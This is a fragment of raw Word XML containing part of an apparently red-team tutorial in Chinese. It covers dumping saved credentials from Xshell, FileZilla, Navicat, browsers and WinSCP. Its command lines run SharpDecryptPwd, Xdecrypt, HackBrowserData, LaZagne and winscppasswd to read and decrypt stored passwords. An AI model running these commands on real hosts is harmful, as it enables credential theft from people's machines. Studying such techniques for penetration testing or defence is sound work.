                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="b获取xshell保存的凭证"/>
      <w:r>
        <w:t>(b)、获取XShell保存的凭证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Xshell会将服务器连接信息保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>.xsh</w:t>
      </w:r>
      <w:r>
        <w:t>文件中，不同版本之间有所不同。如果用户勾选了"记住用户名/密码"，该文件会保存远程服务器连接的用户名和经过加密后的密码。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="7517"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Xshell版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>.xsh路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Xshell 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>%USERPROFILE%\Documents\NetSarang\Xshell\Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Xshell 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>%USERPROFILE%\Documents\NetSarang Computer\6\Xshell\Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Xshell 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>%USERPROFILE%\Documents\NetSarang Computer\7\Xshell\Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Xshell 7之前的版本，可以使用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/uknowsec/SharpDecryptPwd" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>SharpDecryptPwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>工具解密，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>WinSCP、TeamViewer、FileZilla、NavCat、Xmangager</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>SharpDecryptPwd.exe -Xmangager -p Session_Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Xshell 7可以使用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/dzxs/Xdecrypt" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Xdecrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>python Xdecrypt.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1690370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1690687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="c获取filezilla保存的凭据"/>
      <w:r>
        <w:t>(c)、获取FileZilla保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> FileZilla将所有FTP登录凭据以Base64密文的格式保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>%USERPROFILE%\AppData\Roaming\FileZilla\recentservers.xml</w:t>
      </w:r>
      <w:r>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>SharpDecryptPwd.exe -FileZilla</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="d获取navicat保存的凭据"/>
      <w:r>
        <w:t>(d)、获取NaviCat保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>SharpDecryptPwd.exe -NavicatCrypto</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="e获取浏览器保存的凭据"/>
      <w:r>
        <w:t>(e)、获取浏览器保存的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/moonD4rk/HackBrowserData" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>HackBrowserData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hack-browser-data--windows-64bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> -b all -f json --dir results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="2621915"/>
            <wp:effectExtent l="0" t="0" r="444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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5481955" cy="2621915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">agne.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "javascript:;" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5402580" cy="161544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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5402580" cy="1615440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>agne.exe browsers -firefox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>agne.exe all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>agne.exe all -oN -output C:\Users\test\Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   #将结果以txt格式输出到指定位置</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="f获取winscp保留的凭据"/>
      <w:r>
        <w:t>(f)、获取WinSCP保留的凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r>
        <w:t>获取username、hostname、encrypted password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>winscppasswd.exe 172.20.10.13 root A35C475BCE48E217394A552E3333286D6B6E726E6C726D6C726D6F6D2D3D263F38396F7D1C7F48FDFD84626E6B4365EBD6A6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="708860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="423545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="423765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">SharpDecryptPwd.exe  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkStart w:id="63" w:name="g获取历史连接wifi密码"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkEnd w:id="63"/>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OTcwMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="002323EE"/>
    <w:rsid w:val="00E54DB8"/>
    <w:rsid w:val="04EC1C3A"/>
    <w:rsid w:val="0A3B64DE"/>
    <w:rsid w:val="0D7511DD"/>
    <w:rsid w:val="0E3B1B1E"/>
    <w:rsid w:val="12014936"/>
    <w:rsid w:val="12822212"/>
    <w:rsid w:val="146E2363"/>
    <w:rsid w:val="178624E4"/>
    <w:rsid w:val="1B4855C5"/>
    <w:rsid w:val="1FD10569"/>
    <w:rsid w:val="218C739E"/>
    <w:rsid w:val="253316A2"/>
    <w:rsid w:val="25395621"/>
    <w:rsid w:val="259E6787"/>
    <w:rsid w:val="28310B13"/>
    <w:rsid w:val="287D6366"/>
    <w:rsid w:val="29936CB0"/>
    <w:rsid w:val="2B3343C9"/>
    <w:rsid w:val="2DF23F5C"/>
    <w:rsid w:val="308A48D5"/>
    <w:rsid w:val="33066D4B"/>
    <w:rsid w:val="33934640"/>
    <w:rsid w:val="3564251A"/>
    <w:rsid w:val="3B9C2EA9"/>
    <w:rsid w:val="46E7412F"/>
    <w:rsid w:val="47170EB2"/>
    <w:rsid w:val="48773D01"/>
    <w:rsid w:val="49144504"/>
    <w:rsid w:val="4A422615"/>
    <w:rsid w:val="4A7C1915"/>
    <w:rsid w:val="4AF15BDC"/>
    <w:rsid w:val="4C063D9D"/>
    <w:rsid w:val="4C924C68"/>
    <w:rsid w:val="4CDC3D7A"/>
    <w:rsid w:val="4CFA0297"/>
    <w:rsid w:val="4D5507BF"/>
    <w:rsid w:val="519B4F92"/>
    <w:rsid w:val="54C03EE9"/>
    <w:rsid w:val="56423E6D"/>
    <w:rsid w:val="568674C0"/>
    <w:rsid w:val="57273D7A"/>
    <w:rsid w:val="593C7F85"/>
    <w:rsid w:val="593F4DC2"/>
    <w:rsid w:val="598C5812"/>
    <w:rsid w:val="5A191885"/>
    <w:rsid w:val="5A3333ED"/>
    <w:rsid w:val="5AC254B2"/>
    <w:rsid w:val="5CF7363A"/>
    <w:rsid w:val="5D772E7D"/>
    <w:rsid w:val="5E231BA8"/>
    <w:rsid w:val="6073768C"/>
    <w:rsid w:val="61C12CD1"/>
    <w:rsid w:val="62061EA0"/>
    <w:rsid w:val="634F4011"/>
    <w:rsid w:val="63E524EC"/>
    <w:rsid w:val="65A25E80"/>
    <w:rsid w:val="680F3BD8"/>
    <w:rsid w:val="6ABE3DCB"/>
    <w:rsid w:val="6B4F4F6A"/>
    <w:rsid w:val="72BB5198"/>
    <w:rsid w:val="73330C51"/>
    <w:rsid w:val="762D3601"/>
    <w:rsid w:val="771A7688"/>
    <w:rsid w:val="77902D02"/>
    <w:rsid w:val="7C450253"/>
    <w:rsid w:val="7DBF4AE5"/>
    <w:rsid w:val="7FA17BAB"/>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qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="18">
    <w:name w:val="Normal Table"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>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Emphasis"/>
    <w:basedOn w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="21">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="22"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="22"/>
    <w:qFormat/>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2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="34"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="37"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="22"/>
    <w:qFormat/>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uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="DataTypeTok"/>
